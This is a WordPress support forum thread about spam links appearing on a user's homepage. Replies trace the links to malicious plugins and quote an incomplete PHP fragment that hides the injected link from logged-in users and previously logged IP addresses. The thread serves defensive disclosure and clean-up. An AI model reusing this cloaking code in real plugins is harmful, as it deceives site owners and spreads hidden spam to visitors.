Support » Fixing WordPress » My Site deface link integrated on my homepage

Viewing 6 replies - 1 through 6 (of 6 total)
  • WPyogi





    You can find that link on several other sites if you make a Google search for it. It looks like an intrusion/ hack into your site, though security check tools do not show that. Review:

    Edit: Follow WPyogi’s advice above.




    Ok thanks all,

    Problem resolve i’m replace all file wp-admin,wp-includes except wp-config.php and wp-content and back to normal.

    Thanks you so much.

    Actually no one hacked into your site the way you might think – the spam links are created by a malicious WordPress plugins you downloaded directly from The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users…

    The following plugins are known to be linked to the spammer;

    g-translate (note the hyphen – other versions are fine)

    If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.

    Malicious code (this is normally found in setup.php or install.php)

    if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
    if ($loggedin == 'no') {
    $ip = $_SERVER['REMOTE_ADDR'];
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    $filestring= $contents;
    $findme  = $ip;
    $pos = strpos($filestring, $findme);
    if ($pos === false) {
    <p align="center"><a href=""></a></p>
    <?php //
    } else {
    echo '';

    The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.

    [ Thanks but please do not post spammy links like that on these forums ]

    The trick works well because the link itself is not visible to the site owner as firstly, it doesn’t show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link to any recorded IP addresses.

    Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users…

    it’s the best 100% staffed by volunteer system available. Sometimes that happens and when it’s properly reported it gets dealt with quickly.

    For example this one was discovered and dealt with.


    I haven’t validated your other listed plugins but if you have specific information about those plugins please send the details to plugins [at] and those plugins will get looked at.

    Actually all the others on the list have already been dealt with so I see WordPress do have a lot of moderators here that seem to do a great job in protecting other WordPress users.

    The issue is however, there’s no doubt other plugins live right now, created by the same spammer, that we don’t know about. When they create a new plugin it ‘survives’ for a few weeks without being detected, which is enough for a good few hundred sites to get infected. Once you install one of the dodgy plugins created by this spammer it hard to even notice you have a problem, because of the way it deceptively hides the link to the site owner.

    Also many thousands of sites remain infected right now by the plugins I listed above, even though they were removed quite quickly.

    Is there anyway for WordPress to email users that have installed a plugin after it gets removed for reasons like this? I take it once WordPress is installed on their own domain there’s no connection between WordPress servers and the site owner?

    See these links for more information

    To see just how widespread he problem is just type in one of the spammy domains into Google and see just how many thousands are displaying the link on their blog. (couple of the links are in the links I provided above).


Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘My Site deface link integrated on my homepage’ is closed to new replies.